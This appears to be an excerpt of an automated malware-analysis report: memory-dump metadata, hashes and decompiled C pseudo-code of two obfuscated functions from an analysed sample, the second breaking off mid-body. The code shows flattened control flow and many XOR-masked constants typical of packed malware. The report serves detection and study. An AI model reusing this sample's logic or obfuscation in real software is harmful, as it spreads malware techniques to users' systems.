                                                      0x0023d414
                                                      0x0023d419
                                                      0x00000000
                                                      0x0023d419
                                                      0x0023d3c0
                                                      0x0023d3c6
                                                      0x00000000
                                                      0x00000000
                                                      0x0023d3e6
                                                      0x0023d3e8
                                                      0x0023d3ed
                                                      0x0023d3f1
                                                      0x0023d3f5
                                                      0x0023d3f5
                                                      0x0023d20d

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$.ll:$.$?o$@l$@|$Qjcc$T$Ta$ $Ta$ $XD$^$m^$r$rW$,$3$q$~
                                                      • API String ID: 0-3595463394
                                                      • Opcode ID: 0eafe49303bd8d60036b7d9460279cacbae51b3b53c16940995e943add2d1a7e
                                                      • Instruction ID: 6af76bccb27828694191b778dbff72edd729dd73bd216f88898328532aacbe5a
                                                      • Opcode Fuzzy Hash: 0eafe49303bd8d60036b7d9460279cacbae51b3b53c16940995e943add2d1a7e
                                                      • Instruction Fuzzy Hash: 62720FB15183818BE3B8CF25D54AB9BBBE1BBC4304F10891DE5D9962A0DBB58859CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 98%
                                                      			E0023D7EB() {
                                                      				char _v520;
                                                      				char _v1040;
                                                      				signed int _v1044;
                                                      				signed int _v1048;
                                                      				signed int _v1052;
                                                      				signed int _v1056;
                                                      				signed int _v1060;
                                                      				signed int _v1064;
                                                      				signed int _v1068;
                                                      				signed int _v1072;
                                                      				signed int _v1076;
                                                      				signed int _v1080;
                                                      				signed int _v1084;
                                                      				signed int _v1088;
                                                      				signed int _v1092;
                                                      				signed int _v1096;
                                                      				signed int _v1100;
                                                      				signed int _v1104;
                                                      				signed int _v1108;
                                                      				signed int _v1112;
                                                      				signed int _v1116;
                                                      				signed int _v1120;
                                                      				signed int _v1124;
                                                      				signed int _v1128;
                                                      				signed int _v1132;
                                                      				signed int _v1136;
                                                      				signed int _v1140;
                                                      				signed int _v1144;
                                                      				signed int _v1148;
                                                      				signed int _v1152;
                                                      				signed int _v1156;
                                                      				signed int _v1160;
                                                      				signed int _v1164;
                                                      				signed int _v1168;
                                                      				signed int _v1172;
                                                      				signed int _v1176;
                                                      				signed int _v1180;
                                                      				signed int _v1184;
                                                      				signed int _v1188;
                                                      				signed int _v1192;
                                                      				signed int _v1196;
                                                      				signed int _v1200;
                                                      				signed int _v1204;
                                                      				signed int _v1208;
                                                      				signed int _v1212;
                                                      				void* _t365;
                                                      				intOrPtr _t367;
                                                      				signed int _t379;
                                                      				void* _t380;
                                                      				void* _t399;
                                                      				intOrPtr _t402;
                                                      				signed int _t408;
                                                      				intOrPtr _t409;
                                                      				intOrPtr* _t410;
                                                      				signed int _t411;
                                                      				signed int _t412;
                                                      				signed int _t413;
                                                      				signed int _t414;
                                                      				signed int _t416;
                                                      				signed int* _t417;
                                                      				void* _t419;
                                                      
                                                      				_t417 =  &_v1212;
                                                      				_v1164 = 0xe848;
                                                      				_v1164 = _v1164 << 0xc;
                                                      				_t380 = 0xeb1d0fe;
                                                      				_v1164 = _v1164 << 2;
                                                      				_v1164 = _v1164 ^ 0x3a120029;
                                                      				_v1196 = 0xb50a;
                                                      				_v1196 = _v1196 * 0x54;
                                                      				_v1196 = _v1196 << 1;
                                                      				_v1196 = _v1196 << 0xc;
                                                      				_v1196 = _v1196 ^ 0x6ce97179;
                                                      				_v1072 = 0xa1a9;
                                                      				_v1072 = _v1072 >> 6;
                                                      				_v1072 = _v1072 ^ 0x00006740;
                                                      				_v1112 = 0x5ab8;
                                                      				_v1112 = _v1112 | 0xd40f1486;
                                                      				_v1112 = _v1112 ^ 0xd40f3c8d;
                                                      				_v1168 = 0x99b2;
                                                      				_v1168 = _v1168 ^ 0x8e209920;
                                                      				_v1168 = _v1168 + 0x17b0;
                                                      				_v1168 = _v1168 + 0xffff252c;
                                                      				_v1168 = _v1168 ^ 0x8e1f3ab7;
                                                      				_v1108 = 0x6700;
                                                      				_v1108 = _v1108 ^ 0xd74b138d;
                                                      				_v1108 = _v1108 ^ 0xd74b4d2a;
                                                      				_v1116 = 0xa6d3;
                                                      				_v1116 = _v1116 << 0xc;
                                                      				_v1116 = _v1116 ^ 0x0a6d47ef;
                                                      				_v1144 = 0x46d4;
                                                      				_v1144 = _v1144 | 0x60392883;
                                                      				_t411 = 0x3e;
                                                      				_v1052 = _v1052 & 0x00000000;
                                                      				_v1144 = _v1144 / _t411;
                                                      				_v1144 = _v1144 ^ 0x018d3ef5;
                                                      				_v1212 = 0x195d;
                                                      				_v1212 = _v1212 + 0x9a8f;
                                                      				_v1212 = _v1212 >> 2;
                                                      				_v1212 = _v1212 >> 0xf;
                                                      				_v1212 = _v1212 ^ 0x00005610;
                                                      				_v1092 = 0x8c48;
                                                      				_v1092 = _v1092 | 0x14bcb660;
                                                      				_v1092 = _v1092 ^ 0x14bcd719;
                                                      				_v1184 = 0xdf30;
                                                      				_v1184 = _v1184 | 0x71150163;
                                                      				_v1184 = _v1184 + 0xffff3ca6;
                                                      				_v1184 = _v1184 >> 5;
                                                      				_v1184 = _v1184 ^ 0x03888299;
                                                      				_v1100 = 0xf0a2;
                                                      				_v1100 = _v1100 >> 2;
                                                      				_v1100 = _v1100 ^ 0x00007018;
                                                      				_v1076 = 0xde4e;
                                                      				_v1076 = _v1076 * 0x25;
                                                      				_v1076 = _v1076 ^ 0x0020254d;
                                                      				_v1084 = 0x8f7c;
                                                      				_v1084 = _v1084 + 0x3023;
                                                      				_v1084 = _v1084 ^ 0x00008967;
                                                      				_v1136 = 0x4c3;
                                                      				_v1136 = _v1136 + 0xbbe6;
                                                      				_v1136 = _v1136 | 0x03b94668;
                                                      				_v1136 = _v1136 ^ 0x03b9f10c;
                                                      				_v1120 = 0xdab0;
                                                      				_v1120 = _v1120 << 2;
                                                      				_v1120 = _v1120 ^ 0x0003158f;
                                                      				_v1080 = 0xb6c1;
                                                      				_v1080 = _v1080 ^ 0x2339c7b2;
                                                      				_v1080 = _v1080 ^ 0x2339156d;
                                                      				_v1152 = 0xaa63;
                                                      				_v1152 = _v1152 | 0x7d17af71;
                                                      				_v1152 = _v1152 << 0xc;
                                                      				_v1152 = _v1152 ^ 0x7af75802;
                                                      				_v1088 = 0x49a;
                                                      				_v1088 = _v1088 >> 9;
                                                      				_v1088 = _v1088 ^ 0x00004f36;
                                                      				_v1192 = 0x2678;
                                                      				_v1192 = _v1192 + 0xb679;
                                                      				_v1192 = _v1192 << 0x10;
                                                      				_v1192 = _v1192 + 0xffff3370;
                                                      				_v1192 = _v1192 ^ 0xdcf068a3;
                                                      				_v1064 = 0xeafb;
                                                      				_v1064 = _v1064 << 1;
                                                      				_v1064 = _v1064 ^ 0x00019538;
                                                      				_v1096 = 0x88f8;
                                                      				_t412 = 0x34;
                                                      				_v1096 = _v1096 * 0x4f;
                                                      				_v1096 = _v1096 ^ 0x002a1ade;
                                                      				_v1132 = 0xf8dd;
                                                      				_v1132 = _v1132 << 0xb;
                                                      				_v1132 = _v1132 * 6;
                                                      				_v1132 = _v1132 ^ 0x2ea92e25;
                                                      				_v1148 = 0xb66c;
                                                      				_v1148 = _v1148 * 0x79;
                                                      				_v1148 = _v1148 * 0x37;
                                                      				_v1148 = _v1148 ^ 0x12863225;
                                                      				_v1044 = 0x2ced;
                                                      				_v1044 = _v1044 | 0x6c1d274b;
                                                      				_v1044 = _v1044 ^ 0x6c1d554c;
                                                      				_v1104 = 0xd4fb;
                                                      				_v1104 = _v1104 + 0xc222;
                                                      				_v1104 = _v1104 ^ 0x0001c0a4;
                                                      				_v1140 = 0xeff1;
                                                      				_v1140 = _v1140 | 0x2c578e17;
                                                      				_v1140 = _v1140 ^ 0x1f5808a8;
                                                      				_v1140 = _v1140 ^ 0x330f90e2;
                                                      				_v1156 = 0x54a4;
                                                      				_v1156 = _v1156 ^ 0xe69aec3e;
                                                      				_v1156 = _v1156 ^ 0x7a062859;
                                                      				_v1156 = _v1156 ^ 0x9c9c8f10;
                                                      				_v1180 = 0xa2be;
                                                      				_v1180 = _v1180 / _t412;
                                                      				_v1180 = _v1180 << 0xb;
                                                      				_v1180 = _v1180 << 6;
                                                      				_v1180 = _v1180 ^ 0x0642737d;
                                                      				_v1204 = 0x65ae;
                                                      				_v1204 = _v1204 + 0xb2b7;
                                                      				_v1204 = _v1204 + 0xbb73;
                                                      				_v1204 = _v1204 << 6;
                                                      				_v1204 = _v1204 ^ 0x0074b164;
                                                      				_v1176 = 0x3ecd;
                                                      				_v1176 = _v1176 | 0x1d534930;
                                                      				_v1176 = _v1176 << 0xa;
                                                      				_v1176 = _v1176 ^ 0x842f9ee3;
                                                      				_v1176 = _v1176 ^ 0xc9d04901;
                                                      				_v1056 = 0xf360;
                                                      				_v1056 = _v1056 | 0x93122b66;
                                                      				_v1056 = _v1056 ^ 0x9312fd26;
                                                      				_v1124 = 0x4a26;
                                                      				_v1124 = _v1124 | 0x286a3d77;
                                                      				_v1124 = _v1124 ^ 0x286a2522;
                                                      				_v1060 = 0x57ed;
                                                      				_v1060 = _v1060 + 0x784b;
                                                      				_v1060 = _v1060 ^ 0x0000c3a5;
                                                      				_v1068 = 0x69c7;
                                                      				_v1068 = _v1068 << 5;
                                                      				_v1068 = _v1068 ^ 0x000d6de9;
                                                      				_v1208 = 0xffbd;
                                                      				_v1208 = _v1208 * 0x3d;
                                                      				_v1208 = _v1208 << 5;
                                                      				_v1208 = _v1208 + 0x87f5;
                                                      				_v1208 = _v1208 ^ 0x079ed184;
                                                      				_v1128 = 0x5d27;
                                                      				_v1128 = _v1128 >> 0xc;
                                                      				_v1128 = _v1128 ^ 0x62edd6dc;
                                                      				_v1128 = _v1128 ^ 0x62ed9c54;
                                                      				_v1048 = 0x8776;
                                                      				_t413 = 0x1e;
                                                      				_t408 = _v1052;
                                                      				_v1048 = _v1048 * 0xc;
                                                      				_v1048 = _v1048 ^ 0x000959b7;
                                                      				_v1172 = 0x35cb;
                                                      				_t379 = _v1052;
                                                      				_v1172 = _v1172 / _t413;
                                                      				_v1172 = _v1172 | 0x92682d74;
                                                      				_v1172 = _v1172 ^ 0x346a72ec;
                                                      				_v1172 = _v1172 ^ 0xa6025f11;
                                                      				_v1188 = 0x8f0f;
                                                      				_t414 = 0x66;
                                                      				_t416 = _v1052;
                                                      				_v1188 = _v1188 / _t414;
                                                      				_v1188 = _v1188 << 5;
                                                      				_v1188 = _v1188 + 0x12e7;
                                                      				_v1188 = _v1188 ^ 0x00003fc5;
                                                      				_v1200 = 0x51b9;
                                                      				_v1200 = _v1200 | 0x17a7f9cb;
                                                      				_v1200 = _v1200 << 8;
                                                      				_v1200 = _v1200 | 0xe40f2208;
                                                      				_v1200 = _v1200 ^ 0xe7fffb08;
                                                      				_v1160 = 0x57cd;
                                                      				_v1160 = _v1160 + 0xffffc371;
                                                      				_v1160 = _v1160 ^ 0x54a04296;
                                                      				_v1160 = _v1160 ^ 0x54a059b8;
                                                      				while(1) {
                                                      					L1:
                                                      					_t399 = 0x5c;
                                                      					do {
                                                      						while(1) {
                                                      							L2:
                                                      							_t419 = _t380 - 0x21daabfe;
                                                      							if(_t419 > 0) {
                                                      								break;
                                                      							}
                                                      							if(_t419 == 0) {
                                                      								_t409 =  *0x24ca2c; // 0x698300
                                                      								_t410 = _t409 + 0x230;
                                                      								while(1) {
                                                      									__eflags =  *_t410 - _t399;
                                                      									if( *_t410 == _t399) {
                                                      										break;
                                                      									}
                                                      									_t410 = _t410 + 2;
                                                      									__eflags = _t410;
                                                      								}
                                                      								_t408 = _t410 + 2;
                                                      								_t380 = 0x3af90ff3;
                                                      								continue;
                                                      							}
                                                      							if(_t380 == 0x222340b) {
                                                      								E00235FB2(_v1208, _v1128, _t379);
                                                      								L27:
                                                      								return _v1052;
                                                      							}
                                                      							if(_t380 == 0x88778bb) {
                                                      								_t416 = E002354FE(_v1088, _v1160, _v1192, _v1064, _t380, _t380, _t408, _v1096, _v1200, _v1172, _v1132, _v1148, _v1044, _t380, _v1104, _t408,  &_v1040, _v1188, _t380, _t379, _v1140, _v1156, _t380, _v1180);
                                                      								_t417 =  &(_t417[0x16]);
                                                      								__eflags = _t416;
                                                      								if(_t416 == 0) {
                                                      									_t380 = 0x222340b;
                                                      								} else {
                                                      									_t380 = 0x212fea65;
                                                      									_v1052 = 1;
                                                      								}
                                                      								while(1) {
                                                      									L1:
                                                      									_t399 = 0x5c;
                                                      									goto L2;
                                                      								}
                                                      							}
                                                      							if(_t380 == 0xeb1d0fe) {
                                                      								_push(_t380);
                                                      								_push(_t380);
                                                      								E0023C6C7(_v1196, _v1072,  &_v520, _t380, _v1112, _v1164, _v1168);
                                                      								_t417 =  &(_t417[7]);
                                                      								_t380 = 0x3304c1c2;
                                                      								while(1) {
                                                      									L1:
                                                      									_t399 = 0x5c;
                                                      									goto L2;
                                                      								}
                                                      							}
                                                      							if(_t380 != 0x212fea65) {
                                                      								goto L24;
                                                      							}
                                                      							E002442DA(_t416, _v1204, _v1176, _v1056, _t379, _v1124);
                                                      							_t417 =  &(_t417[4]);
                                                      							_t380 = 0x2e0be9f8;
                                                      							while(1) {
                                                      								L1:
                                                      								_t399 = 0x5c;
                                                      								goto L2;
                                                      							}
                                                      						}
                                                      						__eflags = _t380 - 0x2e0be9f8;
                                                      						if(_t380 == 0x2e0be9f8) {
                                                      							E00235FB2(_v1060, _v1068, _t416);
                                                      							_t380 = 0x222340b;
                                                      							_t399 = 0x5c;
                                                      							goto L24;
                                                      						}
                                                      						__eflags = _t380 - 0x3304c1c2;
                                                      						if(__eflags == 0) {
                                                      							_push(_v1116);
                                                      							_t365 = E0024889D(0x24c930, _v1108, __eflags);
                                                      							_t367 =  *0x24ca2c; // 0x698300
                                                      							_t402 =  *0x24ca2c; // 0x698300
                                                      							E002329E3(_t402, 0x104, _t365, _v1144, _v1212, _v1092, _t367 + 0x230,  &_v1040, _v1184, _v1100);
                                                      							E00242025(_v1076, _t365, _v1084, _v1136);
                                                      							_t417 =  &(_t417[0xc]);
                                                      							_t380 = 0x21daabfe;
                                                      							while(1) {
                                                      								L1:
                                                      								_t399 = 0x5c;
                                                      								goto L2;
                                                      							}
                                                      						}
                                                      						__eflags = _t380 - 0x3af90ff3;
                                                      						if(_t380 != 0x3af90ff3) {
                                                      							goto L24;
                                                      						}
                                                      						_t379 = E00232959(_t380, _v1120, _v1080, _v1152, _v1048);
                                                      						_t417 =  &(_t417[4]);
                                                      						__eflags = _t379;
                                                      						if(_t379 == 0) {
                                                      							goto L27;
                                                      						}
                                                      						_t380 = 0x88778bb;
                                                      						goto L1;
                                                      						L24:
                                                      						__eflags = _t380 - 0x27fd7905;
                                                      					} while (_t380 != 0x27fd7905);
                                                      					goto L27;
                                                      				}
                                                      			}
                                                      0x0023dead
                                                      0x0023deb5
                                                      0x0023deb8
                                                      0x00000000
                                                      0x0023deb8
                                                      0x0023dd90
                                                      0x0023dfca
                                                      0x0023dfd0
                                                      0x0023dfe1
                                                      0x0023dfe1
                                                      0x0023dd9c
                                                      0x0023de77
                                                      0x0023de79
                                                      0x0023de7c
                                                      0x0023de7e
                                                      0x0023de95
                                                      0x0023de80
                                                      0x0023de80
                                                      0x0023de85
                                                      0x0023de85
                                                      0x0023dd75
                                                      0x0023dd75
                                                      0x0023dd77
                                                      0x00000000
                                                      0x0023dd77
                                                      0x0023dd75
                                                      0x0023dda4
                                                      0x0023ddd7
                                                      0x0023ddd8
                                                      0x0023ddfc
                                                      0x0023de01
                                                      0x0023de04
                                                      0x0023dd75
                                                      0x0023dd75
                                                      0x0023dd77
                                                      0x00000000
                                                      0x0023dd77
                                                      0x0023dd75
                                                      0x0023ddac
                                                      0x00000000
                                                      0x00000000
                                                      0x0023ddc8
                                                      0x0023ddcd
                                                      0x0023ddd0
                                                      0x0023dd75
                                                      0x0023dd75
                                                      0x0023dd77
                                                      0x00000000
                                                      0x0023dd77
                                                      0x0023dd75
                                                      0x0023dec2
                                                      0x0023dec8
                                                      0x0023dfa5
                                                      0x0023dfad
                                                      0x0023dfb2
                                                      0x00000000
                                                      0x0023dfb2
                                                      0x0023dece
                                                      0x0023ded4
                                                      0x0023df14
                                                      0x0023df21
                                                      0x0023df42
                                                      0x0023df5c
                                                      0x0023df68
                                                      0x0023df84
                                                      0x0023df89
                                                      0x0023df8c
                                                      0x0023dd75
                                                      0x0023dd75
                                                      0x0023dd77
                                                      0x00000000
                                                      0x0023dd77
                                                      0x0023dd75
                                                      0x0023ded6
                                                      0x0023dedc
                                                      0x00000000
                                                      0x00000000
                                                      0x0023defd
                                                      0x0023deff
                                                      0x0023df02
                                                      0x0023df04
                                                      0x00000000
                                                      0x00000000
                                                      0x0023df0a
                                                      0x00000000
                                                      0x0023dfb3
                                                      0x0023dfb3
                                                      0x0023dfb3
                                                      0x00000000
                                                      0x0023dfbf

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "%j($#0$']$)$6O$@g$H$Kx$M% $e/!$e/!$x&$yql$,$Gm$m$rj4
                                                      • API String ID: 0-131801274
                                                      • Opcode ID: 61fbbcd455303a2ad308e7192a3d92a0ad205c5b633f39f3807cce9f6adba335
                                                      • Instruction ID: f0652c60c2030b04f56ac6c6b72ec14c1f32b52df568f1e03542b88ce1f96c4f
                                                      • Opcode Fuzzy Hash: 61fbbcd455303a2ad308e7192a3d92a0ad205c5b633f39f3807cce9f6adba335
                                                      • Instruction Fuzzy Hash: 9A0213B1119380DFE369CF61D58AA5BBBF1FBC5708F10891DE29A86260C7B58958CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E0023F98C(intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				char _v1;
                                                      				char _v96;
                                                      				char _v108;
                                                      				char _v112;
                                                      				char _v116;
                                                      				intOrPtr _v120;
                                                      				char _v124;
                                                      				char _v128;
                                                      				signed int _v132;
                                                      				signed int _v136;
                                                      				signed int _v140;
                                                      				signed int _v144;
                                                      				signed int _v148;
                                                      				signed int _v152;
                                                      				signed int _v156;
                                                      				signed int _v160;
                                                      				signed int _v164;
                                                      				signed int _v168;
                                                      				signed int _v172;
                                                      				signed int _v176;
                                                      				signed int _v180;
                                                      				signed int _v184;
                                                      				signed int _v188;
                                                      				signed int _v192;
                                                      				signed int _v196;
                                                      				signed int _v200;
                                                      				signed int _v204;
                                                      				signed int _v208;
                                                      				signed int _v212;
                                                      				unsigned int _v216;
                                                      				signed int _v220;
                                                      				signed int _v224;
                                                      				signed int _v228;
                                                      				signed int _v232;
                                                      				intOrPtr _v236;
                                                      				signed int _v240;
                                                      				signed int _v244;
                                                      				signed int _v248;
                                                      				signed int _v252;
                                                      				signed int _v256;
                                                      				signed int _v260;
                                                      				signed int _v264;
                                                      				intOrPtr _v268;
                                                      				void* __ecx;
                                                      				void* _t344;
                                                      				void* _t374;
                                                      				signed int _t377;
                                                      				intOrPtr _t391;
                                                      				void* _t392;
                                                      				intOrPtr _t393;
                                                      				signed int _t395;
                                                      				intOrPtr _t396;
                                                      				signed int _t397;
                                                      				intOrPtr* _t401;
                                                      				intOrPtr _t403;
                                                      				intOrPtr* _t416;
                                                      				char* _t448;
                                                      				signed int _t450;
                                                      				signed int _t451;
                                                      				signed int _t452;
                                                      				signed int _t453;
                                                      				signed int _t454;
                                                      				signed int _t455;
                                                      				signed int _t456;
                                                      				signed int _t457;
                                                      				signed int _t458;
                                                      				signed int _t459;
                                                      				char* _t460;
                                                      				void* _t461;
                                                      				intOrPtr* _t468;
                                                      				void* _t470;
                                                      				void* _t472;
                                                      
                                                      				_t401 = _a4;
                                                      				_push(_a16);
                                                      				_t468 = __edx;
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_t401);
                                                      				_push(__edx);
                                                      				E0023602B(_t344);
                                                      				_v180 = 0x2a54;
                                                      				_t470 =  &_v268 + 0x18;
                                                      				_v180 = _v180 ^ 0xdbb28899;
                                                      				_t403 = 0;
                                                      				_t461 = 0x405be48;
                                                      				_v268 = 0;
                                                      				_t450 = 0x55;
                                                      				_v180 = _v180 * 0x34;
                                                      				_v180 = _v180 ^ 0xa04911e4;
                                                      				_v164 = 0x788;
                                                      				_v164 = _v164 * 0x79;
                                                      				_v164 = _v164 ^ 0x00038f4a;
                                                      				_v260 = 0xdd03;
                                                      				_v260 = _v260 ^ 0x82285f25;
                                                      				_v260 = _v260 >> 7;
                                                      				_v260 = _v260 << 4;
                                                      				_v260 = _v260 ^ 0x104552fc;
                                                      				_v132 = 0x81fa;
                                                      				_v132 = _v132 | 0x4b6553e1;
                                                      				_v132 = _v132 ^ 0x4b658f00;
                                                      				_v208 = 0xbd69;
                                                      				_t451 = 0x73;
                                                      				_v208 = _v208 / _t450;
                                                      				_v208 = _v208 + 0x56ba;
                                                      				_v208 = _v208 ^ 0x000029ec;
                                                      				_v156 = 0x625a;
                                                      				_v156 = _v156 + 0xffff65b2;
                                                      				_v156 = _v156 ^ 0xffffa807;
                                                      				_v176 = 0xc378;
                                                      				_v176 = _v176 >> 1;
                                                      				_v176 = _v176 + 0x1919;
                                                      				_v176 = _v176 ^ 0x00004408;
                                                      				_v228 = 0xbfad;
                                                      				_v228 = _v228 + 0xffff004b;
                                                      				_v228 = _v228 / _t451;
                                                      				_t452 = 0x16;
                                                      				_v228 = _v228 / _t452;
                                                      				_v228 = _v228 ^ 0x0019c242;
                                                      				_v264 = 0x218a;
                                                      				_v264 = _v264 | 0xaefe0d97;
                                                      				_v264 = _v264 + 0x77f0;
                                                      				_v264 = _v264 + 0xffffbecb;
                                                      				_v264 = _v264 ^ 0xaefe1c0e;
                                                      				_v152 = 0x1773;
                                                      				_v152 = _v152 + 0x7c73;
                                                      				_v152 = _v152 ^ 0x000090c4;
                                                      				_v140 = 0xfcb3;
                                                      				_v140 = _v140 + 0xffff1dd8;
                                                      				_v140 = _v140 ^ 0x00004a86;
                                                      				_v252 = 0x9e2f;
                                                      				_t453 = 9;
                                                      				_v252 = _v252 / _t453;
                                                      				_v252 = _v252 << 0xc;
                                                      				_v252 = _v252 + 0x6e7b;
                                                      				_v252 = _v252 ^ 0x01198ad6;
                                                      				_v136 = 0x978d;
                                                      				_v136 = _v136 << 0xb;
                                                      				_v136 = _v136 ^ 0x04bc6438;
                                                      				_v144 = 0xf0b5;
                                                      				_t454 = 0x79;
                                                      				_v144 = _v144 * 0x51;
                                                      				_v144 = _v144 ^ 0x004c2c51;
                                                      				_v224 = 0xa482;
                                                      				_v224 = _v224 ^ 0xc585cea3;
                                                      				_v224 = _v224 / _t454;
                                                      				_v224 = _v224 ^ 0x01a18743;
                                                      				_v148 = 0xd0a0;
                                                      				_v148 = _v148 >> 1;
                                                      				_v148 = _v148 ^ 0x000025e7;
                                                      				_v232 = 0xead1;
                                                      				_v232 = _v232 ^ 0xc3cfbc77;
                                                      				_v232 = _v232 | 0xf3c428cf;
                                                      				_v232 = _v232 + 0xffff938a;
                                                      				_v232 = _v232 ^ 0xf3cf35e7;
                                                      				_v160 = 0xb488;
                                                      				_v160 = _v160 + 0xf6e2;
                                                      				_v160 = _v160 ^ 0x0001c37e;
                                                      				_v212 = 0xc903;
                                                      				_t455 = 0x1e;
                                                      				_v212 = _v212 / _t455;
                                                      				_v212 = _v212 ^ 0xfd3886ab;
                                                      				_v212 = _v212 ^ 0xfd38fa88;
                                                      				_v196 = 0xdd05;
                                                      				_v196 = _v196 << 5;
                                                      				_v196 = _v196 + 0xdc4b;
                                                      				_v196 = _v196 ^ 0x001c7bd6;
                                                      				_v200 = 0x4db0;
                                                      				_v200 = _v200 ^ 0x1a7afaec;
                                                      				_v200 = _v200 >> 8;
                                                      				_v200 = _v200 ^ 0x001a5e83;
                                                      				_v240 = 0x9d3f;
                                                      				_v240 = _v240 >> 8;
                                                      				_v240 = _v240 << 9;
                                                      				_v240 = _v240 + 0x917a;
                                                      				_v240 = _v240 ^ 0x0001a611;
                                                      				_v256 = 0x4a86;
                                                      				_v256 = _v256 >> 0xd;
                                                      				_t456 = 0x55;
                                                      				_v256 = _v256 * 0x35;
                                                      				_v256 = _v256 + 0xffffab30;
                                                      				_v256 = _v256 ^ 0xffffb251;
                                                      				_v204 = 0x386;
                                                      				_v204 = _v204 / _t456;
                                                      				_v204 = _v204 ^ 0xc8309f8e;
                                                      				_v204 = _v204 ^ 0xc830cb09;
                                                      				_v172 = 0x8769;
                                                      				_v172 = _v172 >> 0xe;
                                                      				_v172 = _v172 ^ 0x00003b2d;
                                                      				_v244 = 0x2b5b;
                                                      				_v244 = _v244 + 0xb0ca;
                                                      				_v244 = _v244 + 0xd805;
                                                      				_v244 = _v244 << 2;
                                                      				_v244 = _v244 ^ 0x0006bd06;
                                                      				_v184 = 0x1527;
                                                      				_v184 = _v184 | 0xeeea078d;
                                                      				_t457 = 0x28;
                                                      				_v184 = _v184 / _t457;
                                                      				_v184 = _v184 ^ 0x05f92fca;
                                                      				_v192 = 0x11fc;
                                                      				_t458 = 0x16;
                                                      				_v192 = _v192 / _t458;
                                                      				_v192 = _v192 ^ 0x8895e54e;
                                                      				_v192 = _v192 ^ 0x8895ebcd;
                                                      				_v168 = 0xe011;
                                                      				_v168 = _v168 + 0x4c50;
                                                      				_v168 = _v168 ^ 0x0001058b;
                                                      				_v216 = 0xf07;
                                                      				_t459 = 0x32;
                                                      				_v216 = _v216 * 0x36;
                                                      				_v216 = _v216 >> 2;
                                                      				_v216 = _v216 ^ 0x00008949;
                                                      				_v248 = 0xde23;
                                                      				_v248 = _v248 + 0xecd9;
                                                      				_v248 = _v248 << 0xd;
                                                      				_v248 = _v248 ^ 0x1d8b17f5;
                                                      				_v248 = _v248 ^ 0x24d4a8d4;
                                                      				_v220 = 0x3854;
                                                      				_v220 = _v220 | 0x09b0f0f7;
                                                      				_v220 = _v220 + 0xe63e;
                                                      				_v220 = _v220 ^ 0x09b1b8f3;
                                                      				_v188 = 0x295e;
                                                      				_v188 = _v188 * 0x23;
                                                      				_v188 = _v188 / _t459;
                                                      				_v188 = _v188 ^ 0x00001cf4;
                                                      				_t460 = _v124;
                                                      				while(1) {
                                                      					L1:
                                                      					_t441 = _v236;
                                                      					while(1) {
                                                      						L2:
                                                      						_t472 = _t461 - 0x299f8b6c;
                                                      						if(_t472 <= 0) {
                                                      							break;
                                                      						}
                                                      						if(_t461 == 0x2e2d51e6) {
                                                      							_v124 = 0x14;
                                                      							_t374 = E0023F39F(_v244, _v128, _t460 + 0x60,  &_v124, _v184, _v192, _v164, _t403, _v168);
                                                      							_t403 = _v268;
                                                      							_t470 = _t470 + 0x1c;
                                                      							_t441 = _v236;
                                                      							if(_t374 == 0) {
                                                      								continue;
                                                      							}
                                                      							_t461 = 0x8f3e942;
                                                      							_t403 = 1;
                                                      							_v268 = 1;
                                                      							L29:
                                                      							if(_t461 == 0x33ec2607) {
                                                      								L33:
                                                      								return _v268;
                                                      							}
                                                      							while(1) {
                                                      								L1:
                                                      								_t441 = _v236;
                                                      								goto L2;
                                                      							}
                                                      						}
                                                      						if(_t461 == 0x2e332bc4) {
                                                      							E00242674(_v252, _v136, _a4, _t441, _v144, _v224,  *_t468);
                                                      							_t470 = _t470 + 0x14;
                                                      							_t461 = 0x2452d659;
                                                      							L9:
                                                      							_t403 = _v268;
                                                      							goto L1;
                                                      						}
                                                      						if(_t461 == 0x2efa85f7) {
                                                      							_t377 = _a4 + 1;
                                                      							if((_t377 & 0x0000000f) != 0) {
                                                      								_t377 = (_t377 & 0xfffffff0) + 0x10;
                                                      							}
                                                      							 *((intOrPtr*)(_t401 + 4)) = _t377 + 0x74;
                                                      							_push(_t403);
                                                      							_push(_t403);
                                                      							_t460 = E00238736( *((intOrPtr*)(_t401 + 4)));
                                                      							 *_t401 = _t460;
                                                      							if(_t460 == 0) {
                                                      								goto L33;
                                                      							} else {
                                                      								_t317 = _t460 + 0x74; // 0x74
                                                      								_t441 = _t317;
                                                      								_v116 = _a4;
                                                      								_t461 = 0x332cf2c2;
                                                      								_t403 = _v268;
                                                      								_v236 = _t317;
                                                      								_v120 =  *((intOrPtr*)(_t401 + 4)) - 0x74;
                                                      								continue;
                                                      							}
                                                      						}
                                                      						if(_t461 != 0x332cf2c2) {
                                                      							goto L29;
                                                      						}
                                                      						_t396 =  *0x24ca20; // 0x0
                                                      						_t397 = E00241B49( &_v128, _v264, _t403,  *((intOrPtr*)(_t396 + 0x2c)), _t403, _v152, _v140);
                                                      						_t470 = _t470 + 0x14;
                                                      						asm("sbb esi, esi");
                                                      						_t461 = ( ~_t397 & 0x0493a058) + 0x299f8b6c;
                                                      						goto L9;
                                                      					}
                                                      					if(_t472 == 0) {
                                                      						if(_t403 == 0) {
                                                      							E0023F536(_v156, _v176, _v228,  *_t401);
                                                      						}
                                                      						goto L33;
                                                      					}
                                                      					if(_t461 == 0x405be48) {
                                                      						_t461 = 0x2efa85f7;
                                                      						goto L2;
                                                      					}
                                                      					if(_t461 == 0x8f3e942) {
                                                      						_push(_t403);
                                                      						_push(_t403);
                                                      						E00235F43(_t403, _v128);
